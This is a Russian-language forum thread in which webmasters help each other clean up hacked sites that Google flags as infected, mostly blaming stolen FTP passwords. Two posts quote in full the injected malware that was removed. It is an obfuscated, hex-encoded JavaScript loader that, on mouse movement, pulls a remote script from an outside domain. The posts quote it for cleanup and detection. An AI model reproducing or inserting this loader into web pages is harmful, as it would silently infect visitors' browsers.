[Решено] Дырка в коде?

[rusisha]

Доброго времени суток уважаемые!

Вот ПРОБЛЕМА

Гугл говорит ВИРУС

что делать не знаю...

p.s. прошу прошение за неинформативность топика.

[afwollis]

почистить можно.

но сначала надо просканить свой комп и сменить пароли доступа к хосту.

также есть вероятность, что поимели "соседний сайт" (или вобще весь сервер) однако проверить это не всегда просто.

[rusisha]

проблему решили, огромная благодарность "afwollis" за поддержку.

[monax]

А каким образом решили? Может, не дай Бог, пригодится кому-нить... :)

[gdi31]

Походу Ющенко помог избавиться, как ни как менеджер на сайте :).

[monax]

:lol: Таки да!

Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.

[19th]

:lol: Таки да!

Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.

Не предыдущем хостере было что взломали самого хостера, вернее один из его серверов и через него "завирусили" все сайты. Это было последней каплей.

[Yesvik]

Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.

В 99% случаев это скомпрометированный доступ по FTP. При этом в 99,99% случаев пишут про дырки...

[afwollis]

monax, в заголовке ведь четко написано - "боремся с вирусами".

Ни о каких "дырках в скрипте" речи нет.

Подробно разбирать проблему не стали, хотя известна дата заражения файлов.

Пострадали как всегда индексные файлы, доступные для записи.

Кроме них заражению подверглись header.*, footer.* и большая часть *.js.

Гадость была почищена спец.скриптом, запущенным через cron.

В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива.

[monax]

В 99% случаев это скомпрометированный доступ по FTP.

У меня когда-то тоже подсел вирус на один из моих сайтов. Помню, кипишнул я тогда нипадецки. Первая мысль была - "дырка в коде". Но потом поспрашивал знающих людей и согласился, что, вероятнее всего, таки стырили доступ по ftp. Не факт, что с моего компа, т.к. достаточно трепетно отношусь к безопасности (антивирус, файрвол, антитроян и т.п. :rolleyes: ), но доступ был прописан в Дримвивере ещё на двух других компах. Оттуда, скорее всего, и стянули...

Короче, с тех пор ftp вообще не пользуюсь. Даже заблокировал доступ по ftp на сервере. :lol: И пароли ни на каких других компах не оставляю.

[rabb1tkhv]

monax, в заголовке ведь четко написано - "боремся с вирусами".

Ни о каких "дырках в скрипте" речи нет.

Подробно разбирать проблему не стали, хотя известна дата заражения файлов.

Пострадали как всегда индексные файлы, доступные для записи.

Кроме них заражению подверглись header.*, footer.* и большая часть *.js.

Гадость была почищена спец.скриптом, запущенным через cron.

В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива.

Тоже эта гадость вылезла, причем на двух хостингах сразу (оба хостинга - разные, но у одного хостера)

Если не сложно - поделитесь скриптом для Cron, а то вылавливать код в файлах запарился (((

[Sed]

Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?

[rabb1tkhv]

Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?

Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).

Затем скачал программу http://www.infortech.ru/prj/open/tr/

Сделал автозамену текста

<script type="text/javascript">

var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();

</script>

заменил на пробел ))) во всех файлах.

Все, проблема ушла.

[supleader]

Как уже писали, это скомпрометирован доступ по FTP. Не пользуйтесь менеджерами, которые хранят пароли в открытом виде, а еще лучше использовать защищенный протокол.

[Sed]

Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).

Затем скачал программу http://www.infortech.ru/prj/open/tr/

Сделал автозамену текста

<script type="text/javascript">

var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )();

</script>

заменил на пробел ))) во всех файлах.

Все, проблема ушла.

Не помогло...

[Sed]

Таким способом нашел лишь пять файлов index.html в разных папках. Антивирусом вообще ничего не нашел. Яндекс-вебмастер, например, указывает, что эта страница заражена. http://www.1catalog1.ru/index.php?route=product%2Fproduct&product_id=240 Скачал только ее, внимательно просмотрел код - ничего не нашел. Как можно еще попытаться решить проблему с заражением?

[afwollis]

Sed, тему читайте полностью, а не последние сообщения.

[Sed]

Да все сделал как написано. Сменил пароль, просканил (почистил) комп, почистил файлы - не помогает...

[Fix305]

значит не все файлы почистил

[afwollis]

ищу поциентов для комплексных обследований, вынесений диагнозов и разработки универсальной сыворотки.

возможны побочные эффекты, такие, как:

- впадение в кому;

- временная инвалидность;

- ...

не исключена возможность летальных исходов...

родина вас не забудет.

= = =

обращаться в ЛС только при наличии больного поциента.

Змінено 14 липня 2011 користувачем afwollis